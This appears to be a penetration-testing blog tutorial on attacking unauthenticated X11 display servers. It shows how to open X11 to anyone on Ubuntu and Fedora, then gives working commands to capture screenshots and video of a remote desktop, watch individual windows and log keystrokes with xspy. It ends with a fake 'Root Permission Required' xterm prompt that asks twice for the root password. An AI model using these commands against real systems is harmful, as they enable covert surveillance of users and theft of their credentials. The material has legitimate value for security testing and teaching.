Open X11 Server Exploitation

What is X Server?  X11 is the graphical display engine for Linux.  More information can, naturally, be found at http://en.wikipedia.org/wiki/X_Window_System.  Gnome and KDE are two typical interfaces that run on top of X11.  We will be looking at an OPEN X11 server though, meaning that *anyone* can connect to it over the network w/o authentication.

References:

The Setup

Ubuntu

For Ubuntu 10.04, it took me a while to figure out how to even export X11.
Ubuntu now utilizes GDM, and according to this post, it only takes three step:

  1. sudo nano /etc/gdm/gdm.schemas
  2. Find:
    <schema>
     <key>security/DisallowTCP</key>
     <signature>b</signature>
     <default>true</default>
    </schema>
    1. Set true to false
  3. logout or reboot
  4. Verification: sudo netstat -antp | grep 6000
    1. tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      1806/X
  5. Now, to verify you allow ANYONE to get on x11, type: xhost +

For Ubuntu 12.04, we no longer use GDM (Gnome), but Lightdm.
According to this post, it only takes three step:

  1. sudo nano /etc/lightdm/lightdm.conf
  2. Under the [SeatDefaults] area, add:
    xserver-allow-tcp=true
    allow-guest=true
  3. logout or reboot
  4. Verification: sudo netstat -antp | grep 6000
    1. tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      1806/X
  5. Now, to verify you allow ANYONE to get on x11, type: xhost +

Fedora

I used Fedora 15, and it is very similar to Ubuntu.  I used this source.
  1. vi /etc/gdm/custom.conf
  2. [security]
    DisallowTCP=false
  3. logout/reboot
  4. Now, to verify you allow ANYONE to get on x11, type: xhost +

 Exploitation

So there are several things we can do with an open X11 server: view the video, monitor the keyboard, and a combination of both.

  1. View Screenshots
    1. The first thing we want to do is verify the connection is open and we can get to it:
      xdpyinfo -display <ip>:<display>
      1. We want to see this:
        root@bt:~# xdpyinfo -display 10.1.1.16:0 | less
        name of display:    10.1.1.16:0.0
        version number:    11.0
        vendor string:    Fedora Project
        vendor release number:    11002000
        maximum request size:  16777212 bytes
        motion buffer size:  256
        bitmap unit, bit order, padding:    32, LSBFirst, 32
        image byte order:    LSBFirst
        number of supported pixmap formats:    7
        supported pixmap formats:
            depth 1, bits_per_pixel 1, scanline_pad 32
            depth 4, bits_per_pixel 8, scanline_pad 32
            depth 8, bits_per_pixel 8, scanline_pad 32
            depth 15, bits_per_pixel 16, scanline_pad 32
            depth 16, bits_per_pixel 16, scanline_pad 32
            depth 24, bits_per_pixel 32, scanline_pad 32
            depth 32, bits_per_pixel 32, scanline_pad 32
        keycode range:    minimum 8, maximum 255
        .....<snip>
      2. We do NOT want to see this:
         xdpyinfo:  unable to open display "<ip>:<display>".
    2. We can now take a screenshot of their current display:
       xwd -root -display <ip>:<display> -out xdump.xdump
      1. To display this xdump file, we use the following command: display xdump.xdump
      2. Option 2 would be:
        xwud -in xdump.xdump
    3. We can also record video of the person doing what they are doing (Source): ffmpeg -f x11grab -s <resolution ie 1280×1024) -r 25 -i <ip>:0.0 -sameq output.flv
  2. View Video of a specific window
    1. We will first use xwininfo to find out what windows there are on the screen to watch
      1. root@bt:~# xwininfo -tree -root -display 10.1.1.16:0
        
        xwininfo: Window id: 0x132 (the root window) (has no name)
        
          Root window id: 0x132 (the root window) (has no name)
          Parent window id: 0x0 (none)
             42 children:
             0x1e00007 "gnome-screensaver": ("gnome-screensaver" "Gnome-screensaver")  1024x768+0+0  +0+0
                1 child:
                0x1e00008 (has no name): ()  1x1+-1+-1  +-1+-1
             0x3200003 "Terminal": ()  10x10+-100+-100  +-100+-100
             0x3200001 "Terminal": ("gnome-terminal" "Gnome-terminal")  10x10+10+10  +10+10
                1 child:
                0x3200002 (has no name): ()  1x1+-1+-1  +9+9
             0x10002a3 "Panel": ("gnome-panel" "Gnome-panel")  256x249+235+221  +235+221
        ...<snip>
    2. Now we pick out one of those windowID or Window Names to display.  We can use xwatchwin, which used to be included in Backtrack but isn’t.  Luckily I have a backup here: xwatchwin
      1. ./xwatchwin 192.168.2.126:0 -w -0x3200004
  3. Monitor Keyboard
    1. Backtrack includes xspy in /pentest/sniffers/xspy/xspy.  I have a 7zip copy backed up here: xspy
    2. ./xspy -display <ip>:<display>
    3. Now just wait and watch the typing of the remote user!
    4. root@bt:~/Desktop/xspy# ./xspy -display 10.1.1.16:0
      this is some test typing from a user on an open X11 session!!!
  4. Advanced: Social Engineering
    1. Watching someone type is cool and all, but what we really want is to socially engineer them into giving us the password.  We can utilize xterm to pop open a display on the remote box.  Having xspy monitoring the user input , we will be able to capture the password!
    2. First thing, is to start xspy, utilizing the previous command
    3. Open a display box for them:
      1. xterm -T “Root Permission Required” -display <ip:display> -e “echo -e -n ‘root password: ‘; read passwd; echo ‘Authentication Failure’; echo -e -n ‘root password: ‘; read passwd”
        1. We ask twice, as we don’t want them to mess up.  Twice is always better!

Comments are closed